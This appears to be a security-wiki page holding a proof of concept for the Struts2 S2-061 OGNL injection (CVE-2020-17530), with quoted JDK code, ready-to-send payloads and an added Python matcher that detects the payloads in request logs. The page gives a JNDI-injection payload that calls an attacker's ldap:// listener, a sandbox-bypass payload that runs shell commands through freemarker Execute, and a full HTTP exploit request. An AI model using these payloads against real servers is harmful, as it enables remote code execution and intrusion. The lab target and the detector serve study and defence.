湛蓝安全空间 wiki, All_wiki / Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 / Struts2 s2-061 Poc (CVE-2020-17530).md (file dated 2021-05-21 09:14:38)
# Struts2 s2-061 Poc (CVE-2020-17530)

This bug is not as serious as the headlines suggest: it is essentially a bypass of the S2-059 fix (forced OGNL evaluation of raw user input in tag attributes; fixed again in Struts 2.5.26), so don't overthink it.

Thinking laterally, the BeanMap trick here plays the same role as the gadget used in fastjson exploitation, so a JNDI injection can be built the same way: com.sun.rowset.JdbcRowSetImpl also has a no-argument constructor (so Tomcat's InstanceManager can instantiate it), and its dataSourceName can likewise be set through the BeanMap or, as in the payload below, by calling the setter directly. Storing the name does not open a connection yet:
    
```
    // JdbcRowSetImpl (JDK): the setter only records the name and drops the
    // cached connection; the JNDI lookup happens later, inside connect()
    public void setDataSourceName(String var1) throws SQLException {
        if (this.getDataSourceName() != null) {
            if (!this.getDataSourceName().equals(var1)) {
                super.setDataSourceName(var1);
                this.conn = null;
                this.ps = null;
                this.rs = null;
            }
        } else {
            super.setDataSourceName(var1);
        }

    }
```
    
The JNDI lookup is finally triggered by a method that calls connect() on the row set; the payload below uses getDatabaseMetaData() for this (setAutoCommit(true), the fastjson gadget, works the same way). getAutoCommit() itself does not connect: it only dereferences this.conn, so it throws a NullPointerException unless a connection already exists:
    
    
```
    // JdbcRowSetImpl (JDK): no connect() here; conn must already be set,
    // otherwise this throws NullPointerException
    public boolean getAutoCommit() throws SQLException {
        return this.conn.getAutoCommit();
    }
```
    
JNDI payload (the ldap:// URL points at the attacker's listener; #application['org.apache.tomcat.InstanceManager'] is used to instantiate the class without the new operator, and getDatabaseMetaData() calls connect()):
    
    
```
%{('Powered_by_Unicode_Potats0,enjoy_it').(#UnicodeSec = #application['org.apache.tomcat.InstanceManager']).(#rw=#UnicodeSec.newInstance('com.sun.rowset.JdbcRowSetImpl')).(#rw.setDataSourceName('ldap://192.168.3.254:10086/UnicodeSec')).(#rw.getDatabaseMetaData())}
```
    
Command-execution payload: the value stack is wrapped in a commons-collections BeanMap to reach the OGNL context and its memberAccess, both exclusion sets (excludedClasses, excludedPackageNames) are replaced with empty HashSets, and freemarker.template.utility.Execute then runs the command:
    
    
```
%{('Powered_by_Unicode_Potats0,enjoy_it').(#UnicodeSec = #application['org.apache.tomcat.InstanceManager']).(#potats0=#UnicodeSec.newInstance('org.apache.commons.collections.BeanMap')).(#stackvalue=#attr['struts.valueStack']).(#potats0.setBean(#stackvalue)).(#context=#potats0.get('context')).(#potats0.setBean(#context)).(#sm=#potats0.get('memberAccess')).(#emptySet=#UnicodeSec.newInstance('java.util.HashSet')).(#potats0.setBean(#sm)).(#potats0.put('excludedClasses',#emptySet)).(#potats0.put('excludedPackageNames',#emptySet)).(#exec=#UnicodeSec.newInstance('freemarker.template.utility.Execute')).(#cmd={'whoami'}).(#res=#exec.exec(#cmd))}
```
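Added example, not from the original page: a minimal indicator matcher that flags request bodies carrying either payload shape above (sandbox bypass plus freemarker Execute, or JdbcRowSetImpl plus an ldap:// data source name), including percent-encoded copies as they show up in access logs. The sample bodies are constructed for this example and the indicator names are my own.

```python
"""Indicator matcher for S2-061 style OGNL payloads (added example)."""
import re
from urllib.parse import unquote_plus

# (name, regex). The bare "%{" marker alone is a weak signal; the Struts
# sandbox-bypass pieces and the sink classes are the strong ones.
INDICATORS = [
    ("ognl_expression", re.compile(r"%\{")),
    ("instance_manager", re.compile(r"org\.apache\.tomcat\.InstanceManager")),
    ("beanmap", re.compile(r"org\.apache\.commons\.collections\.BeanMap")),
    ("member_access", re.compile(r"memberAccess")),
    ("sandbox_clear", re.compile(r"excluded(?:Classes|PackageNames)")),
    ("freemarker_execute", re.compile(r"freemarker\.template\.utility\.Execute")),
    ("jdbcrowset_jndi", re.compile(
        r"com\.sun\.rowset\.JdbcRowSetImpl|setDataSourceName\(\s*['\"](?:ldap|rmi)s?://",
        re.I)),
]
STRONG = {"instance_manager", "beanmap", "sandbox_clear",
          "freemarker_execute", "jdbcrowset_jndi"}


def normalize(body: str) -> str:
    """Percent-decode until stable (at most 3 rounds): %25%7B -> %{ ."""
    prev, cur = None, body
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote_plus(cur)
    return cur


def match_indicators(body: str) -> list:
    """Names of all indicators found in the decoded body, in list order."""
    text = normalize(body)
    return [name for name, rx in INDICATORS if rx.search(text)]


def classify(body: str) -> str:
    """'s2-061-exploit' when an OGNL expression carries a strong indicator,
    'suspicious' on any lone hit, otherwise 'clean'."""
    hits = set(match_indicators(body))
    if "ognl_expression" in hits and hits & STRONG:
        return "s2-061-exploit"
    return "suspicious" if hits else "clean"


# Constructed samples (shortened copies of the page's payloads plus a benign body).
SAMPLES = {
    "exec": '%{(#im=#application["org.apache.tomcat.InstanceManager"])'
            '.(#bean=#im.newInstance("org.apache.commons.collections.BeanMap"))'
            '.(#bean.put("excludedClasses",#e))'
            '.(#x=#im.newInstance("freemarker.template.utility.Execute")).(#x.exec(#a))}',
    # JNDI variant as it would appear percent-encoded in an access log
    "jndi_encoded": "id=%25%7B%28%23rw%3D%23UnicodeSec.newInstance%28%27com.sun.rowset."
                    "JdbcRowSetImpl%27%29%29.%28%23rw.setDataSourceName%28%27ldap%3A%2F%2F"
                    "192.168.3.254%3A10086%2FUnicodeSec%27%29%29%7D",
    "benign": "id=42&name=alice%20smith",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, classify(body), match_indicators(body))
```

Run it over decoded POST bodies or the query part of access-log lines; the repeated decoding matters because the `%{` marker is itself percent-encoded (`%25%7B`) on the wire.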
    
via:

https://mp.weixin.qq.com/s/skV6BsARvie33vV2R6SZKw

Analysis:

* https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247485085&idx=1&sn=f264cf31bb82ae957fb985b754890d41&chksm=f9ee6a22ce99e3349b94ef75f77e3c8dadf4ebf47a74921a547429d5180deba122f9593beefc&scene=132#wechat_redirect
* https://mp.weixin.qq.com/s/skV6BsARvie33vV2R6SZKw

VULHUB Struts2 S2-061:

https://github.com/vulhub/vulhub/tree/master/struts2/s2-061

PoC (against the vulhub environment; the OGNL expression is sent in the id form field of a multipart body):
    
    
```
POST /index.action HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 848

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("echo 'forum.ywhack.com'")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
```
    
![](media/16096803266898/16096804259304.jpg)


![](media/16096803266898/16096804320786.jpg)


ref:

https://forum.ywhack.com/thread-114788-1-2.html
    